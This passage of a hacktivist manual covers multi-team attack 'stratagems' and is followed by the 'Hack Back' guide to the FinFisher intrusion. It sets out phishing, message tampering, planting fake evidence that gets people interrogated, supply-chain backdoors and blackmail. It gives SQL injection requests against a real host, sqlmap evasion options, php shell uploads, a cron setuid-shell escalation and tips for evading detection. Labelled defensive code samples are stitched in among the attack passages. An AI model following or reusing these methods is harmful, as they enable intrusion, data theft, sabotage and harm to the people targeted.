destabilize an organization or to acquire trade secrets). The next section of
this essay is devoted solely to exploring the concept of stratagems and how to
best form and use them. Strike teams should be allowed to do what they want,
but their initial stratagem should be approved by the collective so that no two
strike teams attempt to do the same thing at the same time.

Step Three: As a strike team, map your target’s attack surface. If multiple
strike teams are all attacking the same network, they should share information
very closely in this step. It is very possible that multiple strike teams
working together to accomplish the same goal could actually be attacking
different networks, in which case mapping should be done within individual
strike teams. Each member of a given strike team should attempt to map the
target network themselves, and then members should compare information. It is
very unlikely that anything will be overlooked by every single member of the
team.

Step Four: Divide your target network up into manageable chunks and assign
certain individuals within your team to each one of those chunks. Efficient
division of labor is key to launching speedy attacks. Here is an example
involving a network composed of four servers (two SQL servers, a DNS server,
and a web server hosting a feature rich corporate site) and a strike team
composed of six attack specialists and four social engineering specialists:

* Have one attack specialist attack the SQL and DNS servers.

* Have one attack specialist attack the website’s multistage user
registration mechanism and login mechanism.

* Have one attack specialist attack the contact and session management
mechanism.

* Have one attack specialist attack any forms not assigned to other
attack specialists as well as any other potentially exploitable
scripts, pages, or mechanisms.

* Have one attack specialist and two social engineering specialists
attempt to launch some sort of phishing campaign against the
company’s employees.

* Have one attack specialist and two social engineering specialists
attempt to convince the company’s hosting provider that they are the
rightful owners of the company’s four servers and have been locked
out of their email account.

Step Five: Drill yourselves. This step is optional but highly recommended.
Procure a server with a large amount of RAM and multiple processors. Have one
member of your strike team set up a virtual network on it that, to the best of
your knowledge, mimics the network you are planning to attack. This one team
member should not participate in the drills themselves, and they should not
give other team members details pertaining to the virtual network. If you are
planning on attacking a large corporation, set up the virtual network like a
large corporate network with a labyrinth of firewalls, routers, switches, and
domain controllers. If you are planning on attacking a small corporation or
home business, set up your network accordingly. You should never have to
visualize more than 12 workstations, even if your team is doing a complex
pivoting exercise. As a group, attempt to break into your virtual network and
execute your stratagem. The virtual network should be deliberately
misconfigured so that there is a way for your team to infiltrate it and
accomplish their simulated goal, but the misconfigurations should be extremely
subtle. The team should have to work very hard to find them. Run multiple
drills. After each drill, the misconfigurations in the network, and potentially
the layout of the network itself, should be altered to force your team to
attack it in a different way or to exercise a different skill. The purpose of
these drills is twofold. Firstly, they allow your team members to get
accustomed to working together. Secondly, they will prepare your team for the
day when they actually go up against your real target network.

Step Six: Execute your stratagem on your target network. Your strike team
should attack methodically and silently. Every member should know what they
need to do and how they need to do it. No mistakes should be made. Every tool
you use should be well honed and function flawlessly. Not a second should be
wasted. Use time to your advantage. Your target organization will be the most
unprepared for an attack in the middle of the night when all of its IT staff
are at home sound asleep. If your stratagem calls for being embedded in your
target network for a long period of time, tread very lightly once you
infiltrate it.

Interlocking Stratagems in Theory

In this section I will give multiple examples of stratagems that an actual
strike team could make use of. You should combine multiple stratagems to
accomplish your ultimate goal. Individual stratagems are like pieces of a
jigsaw puzzle, and are intended to be pieced together. A strike team should
execute multiple stratagems in succession, possibly in cooperation with other
strike teams in an effort to accomplish a common goal. This section is not
intended to be a play book. I encourage you to build off of my stratagems or,
better yet, devise your own. Some stratagems are:

(1) Collect information on individuals within the target organization. Mount a
phishing campaign against the organization and gain access to as many
workstations as possible. Once you have breached its network, do not pivot.
Attempt to locate any useful information on the workstations you have
compromised, and then remain in the network for as long as possible doing
nothing more than idly gathering intelligence.

(2) Take complete or partial control over the target organization’s main means
of communication (usually email). Review a few of their messages and learn how
they are structured and formatted. Then, send a number of blatantly false
messages to one or more members of the organization using the credentials of
another member of the organization. Multiple false messages should be sent over
some period of time. When members of the organization begin to receive false
messages from their colleagues, distrust will begin to take root.

(3) Take complete or partial control over the target organization’s main means
of communication (usually email). Review a few of their messages and learn how
they are structured and formatted. Then, devise some way to intercept and
inspect or modify messages in transit within the target organization
(essentially, perform a man in the middle attack). Every once in a while, alter
a message in a subtle but disruptive way. Perhaps change a date or a time so
certain individuals do not arrive at their meetings on time or do not arrive at
all. Once you have reason to believe that your modifications have taken their
toll (i.e. the person you targeted missed their meeting), undo the changes you
made to the message you intercepted so upon audit it appears as though the
message was never tampered with. Doing this is usually hard to detect and will
slowly cause the target organization to destabilize itself as tensions between
individuals within it begin to rise and their employees begin to question their
own sanity.
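
Stratagem (3) depends on the altered message looking untampered once it is reverted before an audit. As an added defender-side example that is not part of the original document, the recipient verifies an authentication tag at receipt time and records the outcome locally, so a later revert on the server cannot clean the audit trail. An HMAC with a constructed shared key stands in for the PGP signatures the document recommends; the message text is constructed.

```python
"""Receipt-time integrity verification with a local audit log, as a counter
to alter-then-revert tampering of messages in transit. Added example, not
part of the original document. The key and messages are constructed; in a
real deployment the tag would be a PGP signature."""
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed shared key for this demonstration only.
SHARED_KEY = b"constructed-demo-key-do-not-reuse"


def sign(body: str, key: bytes = SHARED_KEY) -> str:
    """Sender side: authentication tag over the exact message body."""
    return hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()


def verify(body: str, tag: str, key: bytes = SHARED_KEY) -> bool:
    """Constant-time comparison of the recomputed tag with the received one."""
    return hmac.compare_digest(sign(body, key), tag)


@dataclass
class AuditEntry:
    body_sha256: str
    verified: bool


@dataclass
class Inbox:
    """Recipient side: verify on receipt and log the result immediately.
    The log lives with the recipient, not on the mail server, so undoing the
    alteration later does not erase the recorded failure."""
    log: List[AuditEntry] = field(default_factory=list)

    def receive(self, body: str, tag: str) -> bool:
        ok = verify(body, tag)
        digest = hashlib.sha256(body.encode("utf-8")).hexdigest()
        self.log.append(AuditEntry(digest, ok))
        return ok

    def tampering_seen(self) -> bool:
        return any(not entry.verified for entry in self.log)


def demo() -> Tuple[bool, bool, bool, bool]:
    """Walk through the stratagem: the original is delivered, then a copy
    with the meeting time changed, then the original is restored before an
    audit. Returns the three verification results and whether the log
    still shows the tampering."""
    original = "Status meeting moved to Tuesday 14:00 in room 3B."
    tag = sign(original)
    inbox = Inbox()
    accepted_original = inbox.receive(original, tag)
    altered = original.replace("14:00", "16:00")   # the in-transit edit
    accepted_altered = inbox.receive(altered, tag)  # tag no longer matches
    accepted_reverted = inbox.receive(original, tag)
    return (accepted_original, accepted_altered, accepted_reverted,
            inbox.tampering_seen())


if __name__ == "__main__":
    print(demo())  # (True, False, True, True)
```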

(4) Take complete or partial control over the target organization’s main means
of communication (usually email). Review a few of their messages and learn how
they are structured and formatted. Use the credentials of a high ranking
individual within the target organization to distribute a message that appears
to be from them that claims a terrible tragedy has occurred that warrants an
immediate, brash, resource intensive response from the rest of the
organization. You will most likely not be able to pull this off more than once.
This stratagem works especially well against militant groups with poorly
defined command structures but has other applications as well.

(5) Once inside of the target organization’s network, acquire a small amount of
classified data intended for the eyes of high ranking personnel only.
Strategically plant the data on the computer of one or more lower ranking
individuals. Make it look like an espionage attempt. If many key individuals
within the target organization are accused of trying to siphon out its secrets,
it will be forced to suspend a large portion of its operations while an
investigation is done.

(6) Use a DDoS attack to disrupt the target organization’s communications for a
short period of time when they are most in need of it. For a corporation, this
could be during an important international Skype call. For a government, this
could be immediately following a devastating attack from an insurgency group.
Doing this will cause panic, which will make the target organization
temporarily more susceptible to other kinds of attacks.

(7) Pose as a legitimate company selling legitimate software and befriend the
target organization. Create a piece of software with a very hard to detect
security flaw in it and sell it to them. The flaw could be as simple as a
poorly implemented encryption library or as complex as an insecure multistage
parsing algorithm. It must be incredibly subtle. So subtle that if it is
detected you will be able to write it off as unintentional. It should be
plausibly deniable. Once the target organization installs the vulnerable
software on their machines, leverage it to perform targeted attacks on key
individuals within it. Do not use it to infect entire subnets, as that will
draw too much attention.

(8) Locate a small software provider your target organization already does
business with and infiltrate their network by using other stratagems. Modify
their source code slightly so that their software becomes vulnerable to remote
attack. Do not modify just any code you come across, study the software
provider’s development process and target code that has already been checked
for bugs and is days away from being released to customers. When the target
organization installs the latest version of software from the company that you
have infiltrated, they will become vulnerable. Leverage this vulnerability to
perform targeted attacks on key individuals within the target organization. Do
not use it to infect entire subnets, as that will draw too much attention.

(9) Locate a small software provider your target organization already does
business with and infiltrate their network by using other stratagems. Most
software companies offer rewards to security researchers who find
vulnerabilities in their products. Determine how reported vulnerabilities are
managed by the company you have infiltrated and devise a way to monitor them
in real time. As soon as a security researcher reports a major vulnerability
in a product your target organization uses, use it to perform targeted attacks
on key individuals within it. Do not use it to infect entire subnets, as that
will draw too much attention.

(10) Using other stratagems, infiltrate the computers of a number of influential
individuals within the target organization. Monitor their activity constantly
and closely. If possible, listen to them through their computer’s microphone.
When you believe that one of them has left their computer, undo things they
have just done. Delete the last sentence they wrote. Hit the back button on
their web browser. Close the program they just opened. Over time, this will
lead them to question their sanity.

(11) Using other stratagems, infiltrate the computers of a number of influential
individuals within the target organization. Most modern governments and
corporations are at least partially corrupt. Find evidence of this corruption
and use it to compel one or more of these influential individuals to aid your
cause. If you are unable to find any evidence of corruption, do not be afraid
to bluff. If you make a mysterious window pop up on, say, a CFO’s computer that
alludes to some sort of dirty secret, it is very possible that the CFO will
assume that the hacker who caused the window to appear knows something about
them that they actually do not. A lot of powerful people have skeletons in the
closet. The media has instilled a fear of hackers into the general populace,
and this fear can be used to your advantage. Most normal people, upon being
confronted by a hacker that has gained complete control of their computer, will
be inclined to believe plausible sounding white lies. Having an “inside man”
within your target organization can be extremely useful.

Interlocking Stratagems in Practice

In this section I shall present an example of a plausible situation that could
warrant the involvement of hacktivists and a corresponding attack loosely built
upon the stratagems from the last section. I have tried to make the situation
realistic, but it is very likely that if you use my writing to plan and execute
your own attack it will play out nothing like the attack depicted below. Most
actual attacks are far more complex than the one presented here. The purpose
of this example is to demonstrate the way in which multiple strike teams should
work together. Notice how at all times each team has one or more specific
goals.

Situation: A hacktivist collective has decided to attack the terrorist
organization Bina Al-ar-mal after they captured and executed a tourist in
Syria. Bina Al-ar-mal is believed to consist of over 40,000 people, has
hundreds of public Twitter feeds and Facebook accounts, and runs a small
terrorist news site hosted on a Russian server. It has three known leaders, who
we shall refer to as Head Terrorist 1, Head Terrorist 2, and Head Terrorist 3.
Twenty-seven hacktivists have joined the effort. They have been split into
three teams: team 1 consists of five of the most highly skilled hacktivists,
team 2 consists of seven moderately skilled hacktivists, and team 3 consists of
fifteen amateur hacktivists.

Time Line:

(Day 1, Hour 1) Team 1 is initially tasked by the collective with infiltrating
as many terrorist Twitter and Facebook accounts as possible. The team starts
enumerating the accounts immediately. They decide that no drill will be
executed, as breaking into Facebook and Twitter accounts is a trivial task.

(Day 1, Hour 1) Team 2 is initially tasked by the collective with infiltrating
the web hosting provider hosting the terrorist group’s website. They begin
reconnaissance.

(Day 1, Hour 1) Team 3 is initially tasked by the collective with attacking
Bina Al-ar-mal’s website directly. They begin to map the website.

(Day 1, Hour 2) Team 1 finishes enumerating the terrorist Facebook and Twitter
accounts. They begin attempting to break into them.

(Day 1, Hour 2) Team 3 finishes mapping Bina Al-ar-mal’s website and begins to
attack.

(Day 1, Hour 3) Team 1 has breached a few terrorist Facebook and Twitter
accounts. After examining their contents they determine that the terrorists
are using SpookyMail email service to communicate off of social media. A few
terrorist email accounts are identified and the team begins to try to break
into those as well.

(Day 1, Hour 3) Team 3 gains read/write access to a limited portion of the
server Bina Al-ar-mal’s website is hosted on. The other teams are alerted.
They set up a simple PHP-based IP logger script to capture the IP addresses of
Bina Al-ar-mal members attempting to check their organization’s news feed.

(Day 1, Hour 6) Team 2’s reconnaissance ends. They have located the web hosting
provider and gathered information on said provider’s website and servers. They
begin attacking them.

(Day 1, Hour 7) Team 1 breaches their first few terrorist email accounts.

(Day 1, Hour 9) Team 2 locates a vulnerability in the terrorist’s web
hosting provider’s website. They are not able to fully compromise any of their
servers, but they are able to get a list of customer names, domain names, and
billing addresses by exploiting a flaw in the website’s shopping cart feature.
Upon inspecting the list, they discover that the person paying Bina Al-ar-mal’s
hosting bill has a British billing address. The other teams are alerted and
Scotland Yard is notified of the terrorist threat immediately.

(Day 1, Hour 23) Team 1 is able to get Head Terrorist 1’s email address off of
the “contact” pane of one of the hacked terrorist email accounts. They make
ready for a spear phishing attack against him, but decide to wait some time to
launch it, as it is currently the middle of the night where Head Terrorist 1 is
believed to be.

(Day 2, Hour 3) Team 3 has gathered over seven thousand IP addresses of people
viewing Bina Al-ar-mal’s news feed and tries to attack them all using known
router vulnerabilities. When all is said and done they have infected
thirty-seven routers and forty-six workstations. They determine that
thirty-four of these workstations belong to active members of Bina Al-ar-mal.
They observe these workstations passively, hoping to gather information. The
other two teams are briefed on their success.

(Day 2, Hour 8) Team 1 launches a spear phishing attack against Head Terrorist
1 using the hacked email account of another terrorist.

(Day 2, Hour 9) Team 1’s spear phishing attack against Head Terrorist 1 is a
success. They now have full control over his Windows XP laptop and inform the
other two teams of their success. After searching the laptop’s hard drive and
downloading a half gigabyte of confidential documents and IM logs, the team
decides to plant a PDF of the Christian Bible on it along with some real
looking fake papers from the CIA. After gleaning Head Terrorist 2’s and Head
Terrorist 3’s email addresses from the stolen IM logs, the team sends them both
emails from the hacked email account of a lower level terrorist claiming that
Head Terrorist 1 is dirty.

(Day 2, Hour 9) Team 3 decides to take the sensitive information Team 1 stole
from Head Terrorist 1’s computer, along with other fake CIA documents, and place
it on all thirty-four of the terrorist workstations they control. They use a
hacked email account belonging to an uninvolved terrorist to inform Head
Terrorist 2 and Head Terrorist 3 that Head Terrorist 1 is a traitor and that he
has at least thirty-four moles inside of their organization, all of whom they
mention by name.

(Day 2, Hour 10) Head Terrorist 1’s laptop is searched by security forces under
the control of Head Terrorist 2. Head Terrorist 1 is determined to be part of the
CIA and is placed into a cell to be used as leverage against the United States.

(Day 2, Hour 17) Head Terrorist 2 and Head Terrorist 3 raid all thirty-four of
the suspected moles and find the planted documents. They begin to interrogate
all thirty-four of them in order to find out how deep the CIA has penetrated
their organization. None of them know anything but most of them make up real
sounding false information to make the interrogations end.

(Day 3, Hour 3) Team 1 determines that most remaining Facebook and Twitter
accounts cannot be breached. Several team members leave and a few stick around
to try and finish off the remaining accounts.

(Day 6, Hour 17) Scotland Yard arrests the person allegedly paying for Bina
Al-ar-mal’s web hosting. It is later determined that the person is actually
part of a London-based Bina Al-ar-mal cell.

(Day 6, Hour 20) Team 2 destroys Bina Al-ar-mal’s web site after catching word
of the Scotland Yard raid.

End Result: One of three head terrorists is being held by their own
organization as a traitor and thirty-four unrelated terrorists are being held
by their own organization and brutally interrogated about actions they did not
commit. One terrorist is in the custody of Scotland Yard, and a British
terror cell has been exposed. Bina Al-ar-mal’s entire communication network is
compromised (but they do not know that yet), and their website has been taken
offline permanently. All members of Bina Al-ar-mal are now becoming
increasingly suspicious of their fellow members and the hacktivist collective
is now in a position to launch further attacks on Bina Al-ar-mal (using the
compromised email and social media accounts) at a later time. This has all been
accomplished in under a week.

________________________________________________________________________________

My public key is available here:

http://pastebin.com/VhW0bmAt
https://paste.ee/p/C5M3U
http://tny.cz/c9b82da0
http://hastebin.com/jikebijifu.hs
http://chopapp.com/#w04dkx06

SHA1: cb36db996bb684e569663ca7b0d93177ecc561be

Grab it while you still can.

________________________________________________________________________________
Disclaimer: All information provided in this document is for educational
purposes only. The ideas presented here are solely academic and should never be
acted upon or put into practice. The author of this document will not be held
responsible in the event any criminal or civil charges be brought against any
individuals misusing the information in this document to break the law.


Hack Back: A DIY Guide for Those Without the Patience to Wait for Whistleblowers

--[ 1 ]-- Introduction

I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

--[ 2 ]-- Staying Safe

This is illegal, so you’ll need to take some basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

--[ 3 ]-- Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 - 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.

Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com

If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com

…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

--[ 4 ]-- Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.com/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.

* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:"Scripts/scripts.js.php"

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:"Scripts/scripts.js.php" and find the other sites

* Notice they’re all sql injectable in the first url parameter I try.

* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option --tamper='tamper/modsecurityversioned.py'

* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap --file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!
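The three defects the walkthrough relies on (an id interpolated into the query in print.php, an admin page that only sends a Location header, and a ticket attachment upload with no server-side check) beside the server-side fixes a code reviewer would ask for. This is an added example, not code from Gamma or the web design firm; the PDO connection, the session flag, the table and column names and the storage directory are assumptions.

```php
<?php
// Added example (not the site's real code). Assumes a PDO connection $pdo,
// a session-based login that sets $_SESSION['is_admin'], and a hypothetical
// "tickets" table; the storage directory is chosen by the caller.
declare(strict_types=1);

// --- 1. print.php?id=1 and 1=1 ------------------------------------------------
// Weak pattern: the id is pasted into the SQL, so "1 and 2=1" changes the
// result set and the difference acts as a boolean oracle.
function fetch_ticket_unsafe(PDO $pdo, string $id): ?array
{
    $row = $pdo->query("SELECT id, title FROM tickets WHERE id = $id")
               ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Fix: validate the shape, then bind a typed parameter; the value can never
// become SQL. Run the application with a database account that lacks the
// FILE privilege (and is not the admin), so even a successful injection
// cannot read or write files on the server.
function fetch_ticket(PDO $pdo, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;                       // anything but a plain number is rejected
    }
    $stmt = $pdo->prepare('SELECT id, title FROM tickets WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- 2. /BackOffice/ "redirect" -----------------------------------------------
// Weak pattern: header() is sent but the script keeps running and renders the
// admin page; a client that ignores the Location header sees everything.
function require_admin_unsafe(): void
{
    if (empty($_SESSION['is_admin'])) {
        header('Location: /login.php');
        // missing exit: the rest of the page is still generated below
    }
}

// Fix: stop executing after the redirect. The redirect is a courtesy to the
// browser; the exit is the access control.
function require_admin(): void
{
    if (empty($_SESSION['is_admin'])) {
        header('Location: /login.php', true, 302);
        exit;
    }
}

// --- 3. ticket attachments ----------------------------------------------------
// Weak pattern: the only extension check was JavaScript in the form, and the
// server stored the file under its original name inside the web root.
// Fix: decide the type from the bytes, let the server pick name and extension,
// and store outside the document root so nothing here is ever executed.
const ALLOWED_ATTACHMENT_MIME = [
    'application/pdf' => 'pdf',
    'image/png'       => 'png',
    'image/jpeg'      => 'jpg',
];

function store_attachment(array $file, string $storage_dir): string
{
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_ATTACHMENT_MIME[$mime])) {
        throw new RuntimeException("attachment type $mime not allowed");
    }
    // Random server-chosen name; the client-supplied name is never used.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_ATTACHMENT_MIME[$mime];
    $dest = rtrim($storage_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    return $name;   // stored in the ticket record; served back via a download handler
}
```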

--[ 5 ]-- (fail at) Escalating

 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ... nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.

--[ 6 ]-- Pivoting

The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

--[ 7 ]-- Have Fun

Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make do with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!

--[ 8 ]-- Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:

1) Exploits in web browsers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

--[ 9 ]-- Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
